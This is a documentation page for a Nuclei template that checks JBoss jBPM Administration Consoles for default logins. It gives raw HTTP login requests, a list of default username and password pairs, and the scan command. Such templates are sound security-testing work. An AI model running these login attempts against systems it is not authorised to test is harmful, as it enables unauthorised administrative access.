Skip to content
Nuclei Templates

JBoss jBPM Administration Console Default Login - Detect

ID: jboss-jbpm-default-login

Severity: high

Author: DhiyaneshDk

Tags: jboss,jbpm,default-login

Description

Section titled “Description”

JBoss jBPM Administration Console default login information was detected.

YAML Source

Section titled “YAML Source”
id: jboss-jbpm-default-login


info:
  name: JBoss jBPM Administration Console Default Login - Detect
  author: DhiyaneshDk
  severity: high
  description: JBoss jBPM Administration Console default login information was detected.
  reference:
    - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:redhat:jbpm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 12
    shodan-query: html:"JBossWS"
    product: jbpm
    vendor: redhat
  tags: jboss,jbpm,default-login


http:
  - raw:
      - |
        GET /jbpm-console/app/tasks.jsf HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /jbpm-console/app/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        j_username={{user}}&j_password={{pass}}
      - |
        GET /jbpm-console/app/tasks.jsf HTTP/1.1
        Host: {{Hostname}}


    attack: pitchfork
    payloads:
      user:
        - manager
        - user
        - shipper
        - admin
      pass:
        - manager
        - user
        - shipper
        - admin
    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "JBoss jBPM Administration Console"


      - type: word
        part: body_3
        words:
          - "</span>Tasks"


      - type: status
        status:
          - 200
# digest: 490a004630440220650e82e050297dcac03c864a34ecc0142d63640663832d1d8e802ef2235733d002206f28d1cc34175762124536a76058bfe58a3fd0841f15a13572e8f2c26796f9b9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/jboss/jboss-jbpm-default-login.yaml"

View on Github